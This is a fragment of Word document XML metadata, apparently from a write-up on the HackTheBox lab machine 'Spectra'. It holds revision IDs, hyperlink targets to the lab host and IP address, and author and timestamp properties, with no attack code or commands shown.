    <w:rsid w:val="001F4F18"/>
    <w:rsid w:val="00262015"/>
    <w:rsid w:val="00266E77"/>
    <w:rsid w:val="00311819"/>
    <w:rsid w:val="00346537"/>
    <w:rsid w:val="00374FFF"/>
    <w:rsid w:val="003751EB"/>
    <w:rsid w:val="003A48A4"/>
    <w:rsid w:val="003D6EFC"/>
    <w:rsid w:val="003E228C"/>
    <w:rsid w:val="004015FA"/>
    <w:rsid w:val="00476514"/>
    <w:rsid w:val="004E1CA1"/>
    <w:rsid w:val="004F1552"/>
    <w:rsid w:val="0057232B"/>
    <w:rsid w:val="0057445E"/>
    <w:rsid w:val="00574BF2"/>
    <w:rsid w:val="005F221B"/>
    <w:rsid w:val="00601D2C"/>
    <w:rsid w:val="00603BDE"/>
    <w:rsid w:val="00606765"/>
    <w:rsid w:val="00606A2B"/>
    <w:rsid w:val="00607227"/>
    <w:rsid w:val="006B0825"/>
    <w:rsid w:val="006E1D46"/>
    <w:rsid w:val="006F0293"/>
    <w:rsid w:val="00743636"/>
    <w:rsid w:val="00744BD5"/>
    <w:rsid w:val="0075440F"/>
    <w:rsid w:val="00772ED8"/>
    <w:rsid w:val="007913DC"/>
    <w:rsid w:val="00794BD0"/>
    <w:rsid w:val="00797E93"/>
    <w:rsid w:val="007F3970"/>
    <w:rsid w:val="007F5095"/>
    <w:rsid w:val="00804943"/>
    <w:rsid w:val="008538B8"/>
    <w:rsid w:val="0085633F"/>
    <w:rsid w:val="00866469"/>
    <w:rsid w:val="00881BC8"/>
    <w:rsid w:val="00897C96"/>
    <w:rsid w:val="008F2894"/>
    <w:rsid w:val="0094256E"/>
    <w:rsid w:val="00947E22"/>
    <w:rsid w:val="00981259"/>
    <w:rsid w:val="009B6736"/>
    <w:rsid w:val="009D1F20"/>
    <w:rsid w:val="00A6312F"/>
    <w:rsid w:val="00AA77A8"/>
    <w:rsid w:val="00AC387A"/>
    <w:rsid w:val="00B11B92"/>
    <w:rsid w:val="00B43631"/>
    <w:rsid w:val="00B97DFC"/>
    <w:rsid w:val="00BC0964"/>
    <w:rsid w:val="00C72F33"/>
    <w:rsid w:val="00C77BB3"/>
    <w:rsid w:val="00C80575"/>
    <w:rsid w:val="00D1733E"/>
    <w:rsid w:val="00D20F2E"/>
    <w:rsid w:val="00D85CDD"/>
    <w:rsid w:val="00DA4D45"/>
    <w:rsid w:val="00DC5D7D"/>
    <w:rsid w:val="00DE7A1D"/>
    <w:rsid w:val="00DF4B9C"/>
    <w:rsid w:val="00E475EF"/>
    <w:rsid w:val="00EA04E2"/>
    <w:rsid w:val="00EB208E"/>
    <w:rsid w:val="00ED6E35"/>
    <w:rsid w:val="00F07DB9"/>
    <w:rsid w:val="00F462C6"/>
    <w:rsid w:val="00F74204"/>
    <w:rsid w:val="00FC6E9E"/>
    <w:rsid w:val="00FE08C8"/>
    <w:rsid w:val="00FF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64B02"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ACEE5149-BBB7-47B0-9555-E6436D1DC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A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pectra.htb/testing/index.php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hyperlink" Target="http://10.10.10.229:8081/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://spectra.htb/main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://spectra.htb/testing/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://10.10.10.229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18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attacker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>187</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-14T13:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-26T17:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>